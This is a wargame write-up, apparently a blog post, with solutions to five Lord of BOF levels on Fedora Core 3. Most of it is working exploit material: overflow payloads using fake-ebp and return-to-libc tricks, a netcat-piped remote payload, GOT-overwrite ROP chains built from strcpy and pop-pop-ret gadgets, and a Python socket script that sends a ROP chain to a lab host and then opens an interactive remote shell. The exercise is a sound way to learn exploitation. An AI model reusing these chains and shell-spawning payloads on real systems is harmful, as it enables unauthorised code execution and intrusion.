본문 바로가기

Wargames/Lord Of Bof

[Lord Of Bof] Lord Of BOF Solutions ( Fedora 3 )

Solutions

Level 1


- upgraded simple buffer overflow 

; because of Operation System, there are some limits like random stack, ASLR, Ascii Armor, etc memory protection
; so we'd like to use RTL or ROP attack rather than using shellcode
; hint is fake ebp, and i'll use fake ebp + rtl
; and use execve instead of system ; because internal routine of system function, it re-sets geteuid value 
; we need a code which elevate privilege and run /bin/sh because there no more can use shellcode ; so use this code as execve's argv
; careful there is a random stack so if we put some value on stack, it'll be changed every time, also execve's argv in payload
; by using ret address to ret, we can increase eip

; Code : 
#include 
int main(int argc, char *argv[]){
setreuid(geteuid(), geteuid());
system("/bin/sh");
return 0;
}

; execve address : 0x007a5490 + 1 : 0x007a5491
; ret address : 0x08048441
; for file name : 3c ed 83 ( what is on execve's argv[0], so i link my get-shell-program this point and when execve runs, it'll run )
; payload : ln -s ./aaaa $(echo -en \x3c\xed\x83")
                : ./iron_golem $(python -c 'print "A"*268 + "\x41\x84\x04\x08"*2 + "\x91\x54\x7a\x00"')

Level 2


- level 1 + can't deal with sfp 
 
; but payload is same as level 1 ; we didn't need to use sfp area above payload
; ret address : 0x080484b9
; payload : ./dark_eyes $(python -c 'print "A"*268 + "\xb9\x84\x04\x08"*2 + "\x91\x54\x7a\x00"')

Level 3


- remote exploit + similar as level 2
 
; as we know, we can't use fake ebp at least on stack
; tips : do_system function works as execve("/bin/sh", .. ,0) so, just we run this func, we'll get shell! ( i just find it from internet )
; do_system address : 0x0075077f
; payload : (python -c 'print "A"*268 + "\x7f\x07\x75\x00"'; cat) | nc localhost 7777

Level 4


-  got overwriting problem

; for making this prob easy, this binary gives us ppr gadget
; payload form will be like this 
  A*268
  strcpy@plt ppr printf@got+0 system[address of 'first byte']
  strcpy@plt ppr printf@got+1 system[address of 'second byte']
  strcpy@plt ppr printf@got+2 system[address of 'third byte']
  strcpy@plt ppr printf@got+3 system[address  of 'fourth byte']
  printf@plt + A*4 + "/bin/sh"

; ppr address : 0x0804854c
; system address : 0x00 75 07 c0 ( we must find this char in fixed area like got ) ( i get gadget address from other blog hahaha ) 
; strcpy@plt address : 0x08048494
; printf@got address : 0x08049884
; printf@plt address : 0x08048424
; /bin/sh address : 0x00833603
; payload : ./evil_wizard "$(python -c 'print "A"*268 +
"\x94\x84\x04\x08" + "\x4f\x85\x04\x08" + "\x84\x98\x04\x08" + "\x20\x84\x04\x08" +
"\x94\x84\x04\x08" + "\x4f\x85\x04\x08" + "\x85\x98\x04\x08" + "\x2c\x80\x04\x08" + 
"\x94\x84\x04\x08" + "\x4f\x85\x04\x08" + "\x86\x98\x04\x08" + "\xc8\x82\x04\x08" +
"\x94\x84\x04\x08" + "\x4f\x85\x04\x08" + "\x87\x98\x04\x08" + "\x2d\x80\x04\x08" +
 "\x24\x84\x04\x08" + "A"*4 + "\x03\x36\x83\x00"')"

Level 5


- level 4 + cleaning buffer + remote exploit 
 
; payload is similar as previous level ; and we'll use custom stack for saving /bin/sh\0, each chararcter.
; ppr address : 0x080484f3
; gadget for system address : (get them from another blog haha)
; memcpy@got address : 0x08049850
; memcpy@plt address : 0x08048418
; custom stack address : 0x08049878
; strcpy@plt address : 0x08048438
; Python Code :

from socket import *
import os, struct
   
p = lambda x : struct.pack('<I', x)    

ppr = 0x80484f3
strcpy_plt = 0x8048438
memcpy_plt = 0x8048418
memcpy_got = 0x8049850
cus_stack = 0x8049878
sys_1 = 0x80484d0
sys_2 = 0x804817c
sys_3 = 0x80482b4
sys_4 = 0x8048138
slash = 0x8048114
b = 0x8048117
i = 0x8048116
n = 0x804811e
s = 0x8048746
h = 0x80481b8
    
payload = "A"*268
# copy system address to memcpy_got
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(memcpy_got)
payload += p(sys_1)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(memcpy_got+1)
payload += p(sys_2)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(memcpy_got+2)
payload += p(sys_3)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(memcpy_got+3)
payload += p(sys_4)

# copy /bin/sh\0 to custom stack
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack)
payload += p(slash)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack+1)
payload += p(b)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack+2)
payload += p(i)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack+3)
payload += p(n)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack+4)
payload += p(slash)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack+5)
payload += p(s)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack+6)
payload += p(h)
payload += p(strcpy_plt)
payload += p(ppr)
payload += p(cus_stack+7)
payload += p(sys_4)

# run it!
payload += p(memcpy_plt)
payload += "A"*4
payload += p(cus_stack)
    
s = socket(AF_INET, SOCK_STREAM)
s.connect(("192.168.254.130", 8888))
s.send(payload + '\n')
print s.recv(1024)
while True:
        cmd = raw_input('$ ')
        s.send(cmd + '\n')
    print s.recv(1024)
s.close()


ALL CLEAR!


[dark_stone@Fedora_1stFloor ~]$ ls
dropped_item.txt
[dark_stone@Fedora_1stFloor ~]$ cat ./*
                   ,.
                 ,'  `.
               ,' _<>_ `.
             ,'.-'____`-.`.
           ,'_.-''    ``-._`.
         ,','      /\      `.`.
       ,' /.._  O /  \ O  _.,\ `.
     ,'/ /  \ ``-;.--.:-'' /  \ \`.
   ,' : :    \  /\`.,'/\  /    : : `.
  < <>| |   O >(< (  ) >)< O   | |<> >
   `. : :    /  \/,'`.\/  \    ; ; ,'
     `.\ \  /_..-:`--';-.._\  / /,'
       `. \`'   O \  / O   `'/ ,'
         `.`._     \/     _,','
           `..``-.____.-'',,'
             `.`-.____.-','
               `.  <>  ,'
                 `.  ,' 
                   `'
[dark_stone@Fedora_1stFloor ~]$